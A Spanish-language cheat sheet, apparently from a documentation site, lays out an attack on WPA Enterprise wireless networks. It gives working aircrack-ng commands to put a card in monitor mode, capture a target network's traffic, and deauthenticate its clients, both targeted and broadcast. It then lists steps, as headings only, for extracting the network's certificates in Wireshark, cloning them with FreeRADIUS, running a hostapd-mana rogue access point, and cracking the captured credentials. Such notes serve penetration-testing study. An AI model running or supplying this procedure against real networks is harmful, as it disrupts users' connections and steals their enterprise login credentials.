WPA Enterprise
1) Habilitar modo monitor en tarjeta inalámbrica.
sudo airmon-ng check kill && sudo airmon-ng start <interface> && iw dev <interface-mon> info
sudo airmon-ng check kill && sudo airmon-ng start wlan0 && iw dev wlan0mon info2) Captura de paquetes para identificar BSSID, ESSID y canal objetivo.
MGT = tipo de autenticación WPA Enterprise.
sudo airodump-ng <interface-mon>3) Captura de paquetes de BSSID, ESSID y canal específico.
sudo airodump-ng <interface-mon> --bssid <BSSID> --essid <ESSID> -c <channel> -w <file-name> --output-format pcapDesautenticación de cliente(s).
# Desautenticación dirigida
sudo aireplay-ng -0 1 -a <BSSID> -c <client-mac-address> <interface-mon>
# Desautenticación broadcast
sudo aireplay-ng -0 1 -a <BSSID> <interface-mon>4) Deshabilitar modo monitor en tarjeta inalámbrica.
sudo airmon-ng stop <interface-mon> && iw dev <interface> info
sudo airmon-ng stop wlan0mon && iw dev wlan0 info5) Obtención de certificados.
wireshark <file-name>.cap5.1) Aplicar filtro de visualización.
5.2) Exportar y guardar certificados.
Extensible Authentication Protocol -> Transport Layer Security -> TLSvX Record Layer: Handshake Protocol: Certificate -> Handshake Protocol: Certificate -> Certificates
Clic derecho -> Export Packet Bytes -> guardar certificado con extensión
.der.
5.3) Obtener información del certificado y verificar su fecha de vencimiento.
6) Instalación de FreeRADIUS.
6.1) Configuración de certificado ca.cnf.
6.2) Configuración de certificado server.cnf.
6.3) Generación de certificados.
Si ejecutamos make pero los certificados ya existen, no podremos sobrescribirlos. Tenemos que ejecutar make destroycerts para limpiar primero.
7) Instalación y configuración de hostapd-mana.
7.1) Creación y configuración de archivo rogue-ap.conf.
7.2) Creación y configuración de archivo rogue-ap.eap_user.
8) Inicio de rogue access points.
9) Cracking.
Última actualización
¿Te fue útil?